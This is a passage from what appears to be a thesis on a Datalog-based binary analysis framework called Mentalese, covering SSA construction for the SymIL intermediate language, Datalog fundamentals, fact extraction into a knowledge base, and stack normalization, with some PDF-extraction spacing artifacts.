1 P ool = GetAllExpressions() 2 worklist = ∅ 3 P hiMap = ∅ 4 ∀ expr ∈ P ool: 5 HasAlready = ∅ 6 EverBeenOnT heW orklist = ∅ 7 ∀n ∈ Assign(expr): 8 EverBeenOnT heW orklist = EverBeenOnT heW orklist ∪ {n} 9 worklist = worklist ∪ {n} 10 while ( worklist =6 ∅){ 11 current = pop(worklist) 12 ∀y ∈ DF (current): 13 if y∈ / HasAlready: 14 predecessors = GetP reds(y) 15 phi_expr = φ-function( expr, . . . , expr) | {z } length(predecessors) 16 P hiMap = P hiMap ∪ (addr_of(y), phi_expr) 17 HasAlready = HasAlready ∪ {y} 18

19 if y∈ / EverBeenOnT heW orklist: 20 EverBeenOnT heW orklist = 21 EverBeenOnT heW orklist ∪ {y} 22 worklist = worklist ∪ {y} 23 }

Figure 2.10: Placement of φ-functions [63].

Assign function gives us all the nodes that define expr. These nodes are put into the worklist and into EverBeenOnT heW orklist. The reason for the latter set is that the worklist shrinks with each iteration and is oblivious. Since we might process a node earlier due to line 12, which means that the processed node is in the dominance frontier of the current node and might also be an assigning node that has already been placed on the worklist. Note that with the placement of the φ-function we introduce a new assigning node which needs to be put on the worklist if not already done. This is checked on line 19. On line 16, we add the φ-expression to the P hiMap. In the algorithm it is sketched as a set of tuples, but we implemented it as a hashmap over the address of basic blocks to a list of φ−expressions that are added to the block. Each φ-expression is implemented as a data-structure that links the expression to its statement. This way we can directly access the φ-function. Note that we differ here in our definition about φ-functions as opposed to the definition in common literature. When we speak about φ-functions, we refer to the right-hand side of a φ- statement . With the left-hand side of the statement we refer to a φ-expression . 32 2.3. A suitable IL

Renaming

With the placement of the φ-functions, or more precisely, the φ-statements , we now come to the most critical part which is the renaming procedure. The design of the algorithm gives us invaluable information during the renaming process which we exploit for our analyses. The algorithm is given in Figure 2.11. We use the following data structures and functions:

• Counter: is a HashMap that maps a register expression to a counter; used for subscripting the symbols.

• Stack: is HashMap that maps a register expression to a stack of renamed expressions; top of the stack is the live register definition.

• Lhs/Rhs: functions which map an IL-statement to its left-hand side or right- hand side expressions, respectively.

• Register: is a function that returns a set of registers that are part of an IL-expression.

• Lift: returns an abstract environment of the given instruction.

• PhiMap: is a HashMap that maps each basic block to a set of φ-expressions placed in that block.

• WhichPred: is a function that maps (X,Y ) 7→ n ∈ {0, 1, . . . k}, where Y is a predecessor of X, and k = length(predecessors(X)). Each predecessor of X is associated with a unique id. W hichP red gives us that id.

The following node shows a lifted x86-64 basic block in SymIL. Each line is a statement.

———————-0xd484———————- rax_13 ← phi(rax_12,rax_24) rdx_2 ← phi(rdx_1,rdx_5) rsi_2 ← phi(rsi_1,rsi_7) rdi_3 ← phi(rdi_2,rdi_8) rsp_8 ← (rsp-0x98) rax_14 ← 0x0 next_7 ← 0xd489 2. Foundations 33

For clarity, we apply our functions on the block. Let S1 be the first line, then

Lhs(S1) = rax_13 and Rhs(S1) = phi(rax_12, rax_24), which represents the

φ-function. PhiMap maps 0xd484 to the φ-statements at S1,...,S4. On S5 we

have Rhs(S5) = (rsp − 0x98), which is an operation. Applying Register(Rhs(S5)) gives us rsp. The whole block is represented by a SSAMap.

Definition 4. Let BB be an arbitrary basic block and let Si be the ith IL statement processed in BB. The index i is called the order of the IL statement within BB. SSAMap :(Expression×N) → Expression is a function that maps each left-hand side expression of Si to its right-hand side expression: SSAMap(Lhs(Si), i) 7→

Rhs(Si).

Line 1-3 set up the Stack and Counter data structures. They are implemented as HashMaps and there is no need to iterate over all expressions and assign an empty list to them as we can do this on-demand. We do so in the algorithm to clarify the type of Maps. Lines 11-20 specify the renaming procedure of each expression. The function Rename takes an IL-expression and a boolean value which indicates if it is a definition or a use. If it is a use, the top of the stack gives us the live definition of the registers that are used in the expressions. Otherwise, we have a definition, in which case the current state of the counter with respect to the register is extracted from the map. We use the counter to give the register a subscription, i.e., a register r is renamed to register r_i where i is the current state of the counter. On line 19 the current state of the counter is updated by incrementing the counter with respect to the register. On line 22 the actual renaming procedure begins, by starting at the root node of the dominator tree and recursively traversing the tree in a depth first search manner. Lines 26-29 handle the φ-functions. For each φ-statement in the current node, we rename the left-hand side of the statement and update the SSA environment (SSAMap). With each IL statement processed the order is increased. The order makes sure that the same IL statements map to distinct expressions within a block. Combined with the basic block address, the order gives us a unique identifier for each IL statement. This is necessary in a later stage to map IL statements to their assembly counterpart. The Lift function on line 32 needs special care. It is a feature of the Amoco framework and incorporates the functionality of an abstract environment that represents a set of symbolic or concrete states. Access to lifted statements are handled through the API interface of these abstract environments. Lifting here, in particular, means adding an instruction to an environment. Each assembly 34 2.3. A suitable IL instruction that gets lifted and added to the same environment is evaluated in the current context of the execution. While this feature might be useful for symbolic evaluation and execution, we only use the environments for a single purpose, which involves the lifting. In our case lifting an instruction always creates an empty environment to which we add a single instruction and extract the lifted IL statements for the renaming process. Note that the expressions that are associated with the φ-function are not touched before lines 45-50. To clarify what these lines do, let’s assume that the current state of the algorithm is reflected as follows for our x86-64 example :

...... a: rax_7 ← rax_6 + rbx_8 b: rax_9 ← rcx_6

c: rax ← φ(rax_6, rax) ...

The algorithm is currently processing node b, has already processed node a, and has not seen node c. What lines 45-50 do for node b is to replace the live definition of rax in the scope of node b with the corresponding operand of the φ-function. As a consequence, we get rax ← φ(rax_6, rax_9) at c. In its essence, the algorithm follows the original algorithm proposed by Cytron et al., but we adapted it to our IL and added so-called Collectors to it which is inspired by the work of Van Emmerik [204]. We use the Collectors to gather valuable information during the process of the algorithm for later purposes. The Collectors are basically a snapshot of the Stack data-structure we used to keep track of the currently-live definitions. Lines 55-58 make those snapshots at leaf- /calling-nodes. These snapshots are invaluable to map definitions back and forth between a caller and callee context. 2. Foundations 35

1 ∀expr: 2 Stack[expr] = ∅ 3 Counter[expr] = ∅ 4 5 V = root(DomT ree) 6 SSAMaps = ∅ 7 8 CollectCallsstack = ∅ 9 CollectLeafsstack = ∅ 10 11 procedure Rename(expr, is_use): 12 reg_expr = Register(expr) 13 if is_use: 14 return T op(Stack[reg_expr]) 15 16 /*handle definition*/ 17 i = Counter[reg_expr] 18 push reg_expri onto Stack[reg_expr] 19 Counter[reg_expr] + = 1 20 return reg_expri 21 22 procedure Search(V ): 23 SSAMap = ∅ 24 OldDefs = ∅ 25 order = 0 26 ∀ φ-statement ∈ P hiMap[V ]: 27 phi_expr = Rename(Lhs(φ-statement ), false) 28 SSAMap[(expr, order)] = Rhs(φ-statement ) 29 order+ = 1 30 31 ∀Instr ∈ V : 32 Env = Lift(Instr) 33 ∀statement ∈ Env: 34 DefExpr = Lhs(statement) 35 OldDefs = OldDefs ∪ {DefExpr} 36 UseExpr = Rhs(statement) 37 rUseExpr = Rename(UseExpr, true) 38 rDefExpr = Rename(DefExpr, false) 39 40 SSAMap[(rDefExpr, order)] = rUseExpr 41 order+ = 1 42 43 SSAMaps[V ] = SSAMap 44 45 ∀s ∈ CF GSucc(V ): 46 if s ∈ P hiMap: 47 ∀ φ-statement ∈ P hiMap[s]: 48 j = W hichP red(s, V ) 49 φ-function = Rhs(φ-statement): 50 replace j-th Operand in φ-function with Rename(expr, true) 51 52 ∀s ∈ DomT reeSucc(V ): 53 Search(s) 54 55 if V is a calling node: 56 CollectCallsstack[V ] = Copy(Stack) 57 if V is a Leaf in CFG: 58 CollectLeafsstack[V ] = Copy(Stack) 59 60 ∀expr ∈ OldDefs: 61 ∀reg ∈ Register(expr): 62 pop Stack(reg)

Figure 2.11: Renaming IL-Expressions. 36 3 Mentalese - A Binary Analysis Framework

Contents

3.1 From Datalog to Binary Analysis ...... 38 3.1.1 Datalog ...... 39 3.1.2 Knowledgebase: A Mental-IR ...... 41 3.2 Overview ...... 44 3.3 Frontend ...... 47 3.3.1 Stack Normalization ...... 48 3.3.2 SymIL Extensions ...... 50 3.3.3 Scopes ...... 51 3.4 Backend ...... 54 3.4.1 Transition Descriptors ...... 54 3.4.2 Pointer Analysis ...... 57 3.4.3 Flow-Sensitivity ...... 64 3.4.4 Context-Sensitivity ...... 65 3.5 Analysis Derivatives ...... 69 3.5.1 Taint-Analysis ...... 69 3.5.2 Value Propagation ...... 74 3.5.3 Slicing ...... 75 3.6 Experimental Study: Pointer Analysis ...... 77

In this chapter we present the design of our analysis framework and how it contributes to our community. A common pattern we constantly faced in the recent years of experience when working with analysis frameworks is the type of time spend when writing analysis procedures. Most of the time we find ourselves writing a static analysis component in the specific language of the framework by

37 38 3.1. From Datalog to Binary Analysis taking into account the utilized data-structures, variables, and the design of the algorithms. Furthermore, the worklist arrangements we have seen in the last chapter can reach cumbersome dimensions in the process of development. Basically, we lose precious time on establishing an assisting environment rather than concentrating on the problem itself. How can we implement a symbolic taint analyzer, slicer, or a points-to analysis without getting ourselves into those low-level details? What we want is a framework that allows to define an analysis with little effort and knowledge about the underlying environment. Once we have the analysis procedures, another desired property is fusion, i.e., combining the analysis procedures for interoperability. Each analysis can complement the other with valuable insights and facts that are inferred during its procedure. For instance, we might combine a taint analysis with a points-to analysis to track aliased taint, i.e., aliased memory locations that propagate the same taint. We face such a need in Chapter 4. The question we ask here is, how can one analysis efficiently contribute to a set of insights which another analysis can transparently use as if the new insight was always there? A third property of interest concerns the cross-architecture support. Ideally, an analysis can be applied to each architecture without changing any line of code in our analysis algorithms. However, in many cases, we face architecture specific properties which demand adaption in the analysis procedure. Our property of interest here is to keep the core functionality of the analysis and add optional rules to it which complement the analysis and adapt to architecture specific properties on demand. In the current landscape of binary analysis tools, interoperability with other tools that might complement functionality between frameworks is painful and mostly not given. This also concerns the interoperability of the analyses of the same framework. The motivation with our work is not to just add a new framework into the line of existing work, but to present a design that allows to build new analyses in a most natural and flexible manner with scalability and interoperability in mind allowing researchers to built on. In what follows we tackle the desired properties which we have questioned so far.

3.1 From Datalog to Binary Analysis

Datalog, in its essence, is a query language based on the logic paradigm and it is specifically designed to interact with large databases. The demand for modern applications to process large amounts of data in parallel, and reasoning about them in a high level and abstract fashion has given rise into Datalog based system and 3. Mentalese - A Binary Analysis Framework 39

different dialects [10, 206, 111, 212]. One of these dialects is QL, a commercialized Datalog system by Semmle [148] which is designed to do efficient code auditing and vulnerability research on source code. The use of Datalog allows us to express analyses in a highly declarative manner. It turns out that Datalog fulfills most of our requirements in a natural way. Its declarative nature allows us to focus on the “what” task of our problems discarding any low-level details of the algorithms. These are handled by the Datalog engine.

3.1.1 Datalog

In order to understand our approach, this section serves to give a brief primer on Datalog. Datalog is a subset of first-order-logic and can basically be seen as a restricted Prolog without datastructures1. A logic program consists of a finite set of facts and rules. Facts describe certain assertions about a closed world, which, in our case, is a binary application. Facts and rules are represented as Horn clauses of the form:

P0 : − P1,...,Pn

where Pi is a literal of the form p(x1, . . . , xk) such that p is a predicate and the

xj are terms. Each term can be a variable or a constant. The left-hand side of

the clause is called head (P0); the right-hand side is called body. In first-order- logic a clause is a disjunction of literals. A Horn clause is a specific form of a clause with exactly one positive literal:

P0 ∨ ¬P1 ∨ ... ∨ ¬Pn

The clause can be written as

P0 ∨ ¬(P1 ∧ ... ∧ Pn) which is an logical implication:

(P1 ∧ ... ∧ Pn) −→ P0

The conventional way to write this in a logic program is

P0 ←− (P1 ∧ ... ∧ Pn) where the left-arrow symbol is usually replaced by the :- symbol in Datalog programs. A clause is true when each of its literals in the body are true. A clause can also have an empty body which makes it a fact. A classic example of a Datalog program is given as follows: 1This depends on the Datalog dialect. 40 3.1. From Datalog to Binary Analysis

1 Edge(1,2), Edge(2,3), Edge(3,4), Edge(4,1), Edge(4,5).

2 Reach(a,b) :- Edge(a,b).

3 Reach(a,b) :- Reach(a,z), Edge(z,b).

This program computes the reachability between all nodes in the graph. Line 1 defines Edge facts that model a graph. Line 2 says that node a reaches b when there is an edge from a to b. Line 3 computes the transitive closure, i.e., when we reach z from a, and there is an edge from z to b, then a reaches b. Each comma symbol in the body of a clause is a logical conjunction. Applied on the facts, Line 2 gives us a copy of all edges expressed in terms of Reach. This gives us a set of new deduced facts: Reach(1,2), Reach(2,3), Reach(3,4), Reach(4,1), Reach(4,5).

In a new iteration the Datalog engine can now use line 3 to deduce the transi- tive closure. For instance, we have Reach(2,3) and Edge(3,4) which gives us Reach(2,4) by applying Line 3. Lines 2 and 3 define of what is called a Datalog rule. Each Datalog program has so-called safety conditions, i.e., each variable in the head of a rule appears in the body of the same rule. This condition makes sure that if a rule is satisfied, the rule becomes ground. Each fact, predicate/literal, rule or clause is said to be ground if it does not contain any variables, that is, all variables are substituted by constants. For instance, Reach(2,3) and Reach(2,4) are ground instantiations of the rule. Conventional Datalog programs distinguish between intensional database (IDB) and extensional database (EDB) predicates. EDB embodies a collection of a-priori facts , e.g., the edges in our example. These EDB predicates are also called input relations, which build up the base and are fed into Datalog before any analysis code runs. IDB are those predicates that are defined by rules. Rules are deduced facts of those that are known in the closed world. These deduced facts again build up the basis for new facts to be deduced. Datalog programs operate until they are saturated with facts, i.e., no new facts are found and a fixpoint is reached. To get a grasp on what this means we briefly look at the notion of interpretation. Given a Datalog Program, an interpretation I of the program assigns constant values to each literal. This assignment is also called Herbrand Interpretation. An interpretation is a subset of all possible assignments. For instance, { Reach(1,2), Reach(2,3), Reach(3,4), Reach(4,1), Reach(4,5), Reach(1,1), Reach(4,3) } is a possible interpretation. An interpretation I is said to satisfy a clause if every ground instantiation of it is satisfied by I. In such a case the interpretation is said to be a model of the clause. To reach a fixpoint means that we have found a model that satisfies all clauses in the program. 3. Mentalese - A Binary Analysis Framework 41

There are many such models that can satisfy our clauses, but it can be shown that any Datalog program is guaranteed to have a fixpoint with a unique smallest model which is also called a least Herbrand model in the literature. This model can be computed in polynomial time in the number of facts, i.e., the total number of facts that can be computed is a polynomial. The fixpoint based computation is known as the bottom-up evaluation and is the preferred strategy for Datalog. In contrast to Prolog which uses a top-down approach starting from the goal, we start from the base facts and work ourselves bottom-up until we reach the goal. Many program analyses are based on fixpoint algorithms which utilize worklist arrangements [6]. With Datalog, we overcome the design of these arrangements in a natural way. For a thorough introduction that covers more of the theoretical foundations, we refer the reader to [91, 37]. The Datalog engine of our choice is Soufflé [111].

3.1.2 Knowledgebase: A Mental-IR

To process a binary executable with Datalog, we need to transform it into an EDB, that is, we extract facts from the executable. Each fact is a row in a TSV (tab- separated-values) file or can be in a database table. For instance, the edge facts that we saw in the previous section can have the following tab-separated encodings: 1 2 2 3 3 4 4 1 4 5

In Soufflé we can declare an EDB fact by: .decl Edge(a:number, b:number) . input Edge

This tells the engine that Edge is an input-relation or EDB-predicate, and the engine will look for an tab encoded Edge.facts file at a specified location. Each row in that file is now used to instantiate an Edge(a,b) fact. Facts that are interesting for us are first and foremost the expressions of our IL (see Section 2.3). The following code shows a sequence of IL expression in a basic block: ———————0x584e4———————- r3_4 ← M32(r0) M32(r0+4) ← r3_4 r3_5 ← 0 M32(r0) ← r3_5 42 3.1. From Datalog to Binary Analysis

We call this block an IL-Block. To further proceed with the extraction of facts into the EDB, we need to introduce the notion of an IL-Address.

Definition 5. An IL-Address is a tuple (bb, order) where bb is a basic block address and order an index i ∈ N, such that order is the ith IL-Instruction in the IL-Block.

In the block above the IL-Address (0x584e4, 1) corresponds to: M32(r0 +4) ← r3_4

Many IL-Addresses can map to a single instruction address since a single instruction might need several IL-Instructions to model its semantics. The x86-64 push rbp instruction, for instance, is expressed as follows: rsp_0 <- rsp-0x8 (rsp_0) <- rbp

Both statements have different IL-Addresses but map to the same instruction address.

Statement wise, we iterate over the IL-Block processing left-hand side and right- hand side expressions of each statement. Each register on the left hand site is flagged as a definition. This is also the case for registers used as a base address in a memory expression. We do this to better distinguish between a register that is stored to a location where the same register is the base pointer. For instance, we might have: M32(r3_4+4) ← r3_4

We flag r3_4 as a definition for the left hand side and as a use for the right hand side. Applied on our example, each expression that models a register is encoded as follows: 13 r3_4 d -1 361700 0 sub_57DB4 17 r0 u -1 361700 0 sub_57DB4 19 r0 d -1 361700 1 sub_57DB4 23 r3_4 u -1 361700 1 sub_57DB4 29 r3_5 d -1 361700 2 sub_57DB4 31 r0 d -1 361700 3 sub_57DB4 37 r3_5 u -1 361700 3 sub_57DB4

The signature of this EDB predicate is given as follows: Register(reg_id, ssa_name, def_use, is_slice, bb, order, ctx)

Applied to the first row of our encodings, we get the instantiated fact: Register(13, "r3_4", "d", -1, 361700, 0, "sub_57DB4") 3. Mentalese - A Binary Analysis Framework 43

The second term in the predicate specifies if the register is part of a definition denoted by "d" or a use which is denoted by "u". The first term is an ID which is not necessarily unique among all register entries, but has to be unique per instruction. This allows us to parallelize the process of extracting facts from the binary. We use the ID to pinpoint each operand in an equation. For instance, if we extend the statement from above as follows: M32(r3_4+4) ← r3_4 + r3_4

The use/def term alone gives the information that r3_4 is used, but not that it is used twice as an operand. To make this explicit we introduce an ID for each operand per instruction. Combined with the basic block and order, we have a unique identifier for each operand. The third term specifies if the expression is a sliced expression (see Figure 2.7). A -1 indicates that an expression is not a sliced expression, otherwise an ID is given for a Slice. Slices are extracted into a different tab-separated file. Combined with the IL-Address we have a unique identifier in that file to get the correct expression that corresponds to the register. The last term ctx indicates the context of the register, that is, the function in which the register is defined or used. As the predicate signifies, the terms are either strings or integers. Soufflé is a statically typed language and has support for four primitive types: integers, unsigned integers, strings, and float types. The engine also allows types to be subtyped and has support for union types which permit merging several types of the same primitive type. These features help to avoid bugs and common pitfalls due to name equivalences in the binding process. For simplicity reasons we restrict ourselves to integers and strings only. Table 3.1 summarizes the important facts that we extract from the binary into an EDB. From the perspective of abstract interpretation, EDB facts are abstract properties. Note that we dismantle each SymIL statement into each of the EDB facts that are presented in the table, each of which is a property. It is up to the IDB rules that orchestrate the usage of the abstract property to derive knowledge. We cover this concept in the next sections. Besides expressions, we also extract information about the stack pointer, the CFG, φ-expression and several aggregated data. The first column denotes the literal/predicate. The second and third column show the number of terms for each literal and what each term means once the fact gets instantiated. For almost any literal, the last three terms model the address (bb, order, ctx). This triple combines the IL-Address (Defintion 5) with the context (name of the function). Each literal with such a triple stands for information that is present at an address 44 3.2. Overview specified by (bb, order) where bb denotes the basic block address, and order pinpoints the IL-Instruction in an IL-Block. To pinpoint a flaw or interesting insight that we can derive through our analysis framework back to its origin, we need to translate the address of an IL instruction back to the address of the original assembly instruction. This is achieved through a mapping which we also extract into the EDB and which is listed as ILAddrToAddr in Table 3.1. Note that we use this form of addressing since each assembly instruction can map on several IL instructions. Furthermore, there are statements like φ- statement that are citizens of the IL-Block and occupy and IL-address but have no assembly address attached to them. Besides φ-statement which are part of the SSA translation, we also introduce new expressions into the IL-Blocks that help us simplify our Datalog algorithms. We cover each of these in the course of this thesis. Figure 3.1 illustrates how different EDB facts extracted from the binary and which represent the same statement interplay. Each fact can be seen as an abstract element, i.e., an abstraction of the statement. Each instruction is dismantled into these elements that are represented by each literal. Combining each of these elements yields back the statement. This gives us a flexible instrument to build analyzers. Finally, the instantiated EDB and IDB predicates form our Knoweledgebase and its specific design is what we refer to as Mental-IR. Starting with an initial, “mental” image of the program formed by the EDB predicates, each derived fact sharpens our image about the binary under analysis.

3.2 Overview

Our design of Mentalese is divided into two processing stages, a preprocessing stage which is handled by our frontend, and a postprocessing stage that is responsible for the analysis. The frontend receives a CFG specification in JSON and lifts each function of the binary into SymIL (see Figure 2.7) where we dismantle each statement of each lifted basic block into facts. The facts of interest are listed in Table 3.1, and they are called EDB facts which form an initial state of a knowledgebase. This design of a knowledgebase is basically an IR that represents a binary program which we refer to as Mental-IR. EDB facts build the base for the analyses procedures that are established through IDB rules. These algorithms are implemented in the backend of Mentalese which comes with a set of libraries for pointer analysis, taint analysis, slicing, constant value propagation and symbolic evaluation. This is mainly achieved by implementing an inference systems out of Datalog rules which derive new facts. These facts, in turn, 3. Mentalese - A Binary Analysis Framework 45

Table 3.1: EDB-Facts that get extracted from a binary.

Literal Term Description

t0 reg_id: Register ID

t1 ssa_name: Register name in SSA form Register t2 def_use: t2 ∈ {"d", "u"}

t3 slice_id Slice ID

t4, . . . , t6 bb, order, ctx

t0 slice_id: Slice ID

t1 type: t1 ∈ {"Reg","Mem"}

Slice t2 type id: register ID for Reg, and memory ID for Mem

t3 l-bit: Index of lower bound

t4 h-bit: Index of higher bound

t5, . . . , t7 bb, order, ctx

t0 callee: Function to be called

CallTo t1 target: Target entry address

t2 section: code section (.plt, .text, ...)

t3, . . . , t5 bb, order, ctx t entry: Address of function entry Functions 0 t1 ctx: Function name

t0 mem_id: ID associated with memory load/store event

t1 deref_type: t0 ∈ {"load", "store"}

Memory t2 base_type: t0 ∈ {"Reg", "Cst"}; Cst stands for constant value

t3 base_id: ID associated with the base

t4 disp: displacement added to the base

t5, . . . , t7 bb, order, ctx t , t cst_id, cst: ID of a constant (t ), and constant value (t ) Constant 0 1 0 1 t2, . . . , t4 bb, order, ctx

Phi t0, . . . t2 bb, order, ctx: address of a φ-statement

t0 id: ID associated with an equation

t1 operation: +, −, &,...

t2 operand1_type: t2 ∈ {"Reg", "Eqn", "Mem", "Cst"} Equation t3 operand1_id: ID associated with left-hand side operand

t4 operand2_type: right-hand side operand (analogous to t2)

t5 operand2_id: ID associated with left-hand side operand

t6, . . . , t8 bb, order, ctx

Edges t0, . . . , t2 src, dst, ctx: Edge from source to destination in function ctx

t0 stack_pointer: stack pointer in SSA form

StackInfoOffset t1 disp: Displacement added to stack pointer

t2 delta: Stack pointer delta value (SPD)

t3 ctx: Function context

t0 reg_name: Non SSA subscripted register

Scope t1 reg_ssa_name: Register name in SSA form

t2 type_loc: t2 ∈ {"Call", "Leaf"}

t3, . . . , t5 bb, order, ctx t addr: The real instruction address ILAddrToAddr 0 t1, . . . , t3 bb, order, ctx 46 3.2. Overview

Equation(23, ==, Eqn, 24, Cst, 59, 70768, 0, j_realloc) Equation(24, +, Reg, 51, Cst, 58, 70768, 0, j_realloc) Register(51, rax_2, "u", -1, 70768, 0, j_realloc) Register(52, zf_4, "d", -1, 70768, 0, j_realloc) Constant(59, 0, 70768, 0, j_realloc) Constant(58, 2, 70768, 0, j_realloc)

==

Eqn Cst

+ 0

Reg Cst

rax_2 2

Figure 3.1: Syntax tree of zf_4 ← rax_2 + 2 == 0 and facts that represent it. can be used as building blocks for other inference systems to derive a new set of facts. The derived facts are—as we discussed in the previous section—IDB facts, and they contribute to the knowledgebase. Thus, the IR is flexible giving us the chance to sharpen the image or the “mental” representation of the program with each new rule. Figure 3.2 illustrates the high level architecture. As a user we can interact with the IR and the libraries, not only in Datalog, but also through exposed API interfaces which are currently targeting C, partially Rust and Python. It allows us to write queries and probe for interesting properties as well as contribute to the IR. A human user as well as a dynamic analyzer can contribute to the IR with facts bringing insights into the analyses that helps them to perform better. One of our requirements is to make this process transparent, such that each analysis grabs the new information as if it was there from the beginning. Again, the nature of how Mentalese is built with its backend based on Datalog allows us to achieve this requirement. Chapters 4 and 5 give details about new tools that are built on top of Mentalese. 3. Mentalese - A Binary Analysis Framework 47

• Analyses Libraries

contribute ¤

Backend ¹

• Mental-IR

Extract

• SyMIL

Lift Third Party

Frontend IDAPro/Binary Ninja −→CFG Amoco

• Binary File

Figure 3.2: Highlevel Architecture of Mentalese. 3.3 Frontend

The frontend of Mentalese processes the binary and produces the EDB. To do so, it needs a CFG specification, as we do not perform a CFG reconstruction. The CFG specification is a single JSON file that contains the function entry addresses, the function names (if available), and the basic block boundaries associated to each function. This allows for using well-established off the shelf tools, such as IDA Pro, Binary Ninja or Ghidra for the CFG reconstruction. By processing the CFG specification, each function gets lifted to our customized IL, which is done basic block-wise using the Amoco framework. Each IL block is transformed to SSA, which in turn is translated into EDB facts and written to the KnowledgeBase. Figure 3.3 shows the lifting for a x86-64 basic block into SymIL in SSA form. The preprocessing step performs the following tasks: 1. Lifting into SymIL.

2. Stack normalization.

3. Instrumentation: adds meta-registers to SymIL.

4. Transfer SymIL into Mental-IR. 48 3.3. Frontend

———————0x41fa89———————- 0x41fa89 mov edx, [rbp-4] 0x41fa8c mov rax, qword ptr [rbp-16] 0x41fa90 add rax, rdx 0x41fa93 cmp qword ptr [rbp-48], rax 0x41fa97 ja 0x41fa64

Lift

———————0x41fa89———————- rdx_2 ← M32(rsp_0-4)[0:31] <+> 0 [31:63] rax_15 ← M64(rsp_0-16) rax_16 ← rax_15+rdx_2 zf_4 ← (M64(rsp_0-48)-rax_16)==0x0) next_5 ← ((cf_4==0x0)∧(zf_4==0x0)) ? 0x41fa64 : 0x41fa99)

Figure 3.3: x86-64 lifting.

3.3.1 Stack Normalization

On Intel x86 and many other instruction set architectures, the stack pointer is used to keep a reference to the top of the stack. The stack is usually accessed in relation to the current stack pointer. On Intel x86, the frame pointer is additionally linked to the stack pointer and keeps a reference to the beginning of the current stack frame. The frame pointer is usually used to access local variables on the stack. However, it is possible to omit this functionality of the frame pointer giving us an additional general purpose register. This common optimization strategy, also called frame-pointer omission causes that local variables are accessed through the stack pointer only. To uniformly access stack variables, we need a uniform arrangement on how we look at the stack. For this purpose, we normalize the stack and enforce each access through the stack pointer. This is achieved by rebasing all stack accesses to be relative to the stack pointer. Figure 3.4b illustrates this concept. The labels become clear on closer inspection at how a function’s prologue in x86 is lifted to SymIL: pushrbp |rsp_0 ← rsp - 8 | M64(rsp_0) ← rbp mov rbp, rsp | rbp_0 ← rsp_0 sub rsp, 0x20 | rsp_1 ← rsp_0 - 0x20

On the left side we see a standard prologue, on the right side the lifted instructions in SymIL. Each stack access with respect to rbp is now accessed through rsp0. 3. Mentalese - A Binary Analysis Framework 49

In a normalized stack, we refer to the initial stack pointer as the pointer that points to the location before any stack operation is performed, i.e, before the stack frame is set through a function’s prologue. In our example the initial stack pointer is rsp without any SSA subscriptors. To avoid architecture specifics, we denote the initial stack pointer as sp. Figure 3.4a shows the arrangement for a normalized stack on x86 architectures. On ARMv7 and AArch64 architectures, we have the same arrangement, except for the return value not stored on the stack. On the left side of each cell, delta values are denoted with respect to sp. We refer to these delta values as stack pointer delta values (SPD), which we use to model stack addresses. Each delta value can be used to reference a memory cell. For instance, the address

of varx in Figure 3.4 can be modelled by the tuple (−16, 0), i.e, the delta value of the variable plus some optional field which depends on the access footprint. The SPD values give us a flexible instrument to model arbitrary stack accesses.

As a motivation, let’s assume that we have a pointer to the cell of varx and want to access the cell above it. In x86-64 assembly, we might have a code that has the following pattern: mov rax, [rbp - 8] ; sp - 16 mov rbx, [rax + 8]

Such access is described by (−16, 8) which is the address of the adjacent cell of varx. As we see in the next sections, we use these SPD values in our pointer analysis to model points-to relations with respect to stack locations. Definition 6. Let S be the set of all stack variables. Each s ∈ S is a tuple of the

form (spds, flds) where spds is the stack pointer delta of s and fld an optional field value added to the initial stack pointer.

In Table 3.1 we listed StackInfoOffset, a predicate related to the SPD values. Applied to our example, we get:

rsp_0 ← rsp - 8 | StackInfoOffset(rsp_0, 0, -8, fA ). M64( rsp_0 ) ← rbp | rbp_0 ← rsp_0 | rsp_1 ← rsp_0 - 0x20 | StackInfoOffset(rsp_0, -0x20, -0x28, fA ). The third term in the predicate is the calculated SPD value. The instantiated fact,

StackInfoOffset(rsp_0, -0x20, -0x28, fA), is semantically equivalent to: rsp_0 - 0x20 = rsp - 0x28 This gives us an alias with respect to the initial stack pointer. Any stack access with the same SPD value is an alias. We compute the SPD values by performing a reaching definition analysis on the stack pointer. We determine each stack access in SymIL and compute its access with respect to the initial stack pointer and the delta value. Each stack access is then transformed into a StackInfoOffset fact. 50 3.3. Frontend

+8 return 0 sp -8 varx -16

··· (a)

+8 return return 0 sp old rbp old rbp -8 rbp rsp0 varx varx -16

rsp rsp1 ··· ···

(b)

Figure 3.4: Normalized stack for x86 architecture: a) The stack arrangement for a normalized stack. The initial stack pointer (sp) is not touched by the function’s prologue. b) The rebased arrangement for a normalized stack.

3.3.2 SymIL Extensions

To cope with branch conditions and ease interprocedural analyses, we extend our IL by the following pseudo-registers:

• next

• f_ret_*

The next register holds the address of the next intra-procedural basic block. In Figure 3.3 we see how the register is defined for a branch condition; other cases to account for are either 1) a nonconditional jump 2) a call 3) or no jump at all. For the first and trivial case the next register holds the target address of the jump, for the latter two cases the register holds the fall through address. The next register is particularly useful if we need to take branch conditions into account. In Figure 3.3 we can see that the condition is dependent on the zf_4 and cf_4, which in turn is dependent on M64(rsp_0-48) and rax_16. For a taint-analysis it becomes useful as we can track the branches that we control, for a slicer it becomes useful as we 3. Mentalese - A Binary Analysis Framework 51

need to take control dependencies into account where we have to follow expressions that occur in the conditions of the branching blocks. The f_ret_* register is a pseudo register that represents the return value. We use it to mimic a call and define the so called return-receiver which is the register that holds the return value according to the ABI. For x86 it is rax/eax, for ARMv7 it is r0. The * symbol is a wildcard for the function name, that is, the function which is called. For instance, if we call a function A, then we get a pseudo register f_ret_A placed at the end of the IL-block and which defines the return-receiver. Figure 3.6 shows the concept by example. The sample in the figure is taken from libssh2 which is compiled with O0 optimizations for x86-64 and ARM, respectively. This brings us as close as it gets to the source code. We can see the similarity between the blocks that are illustrated for both architectures; the access patterns are the same leading to the same behavior for the function call and even the number of instructions is equal.

3.3.3 Scopes

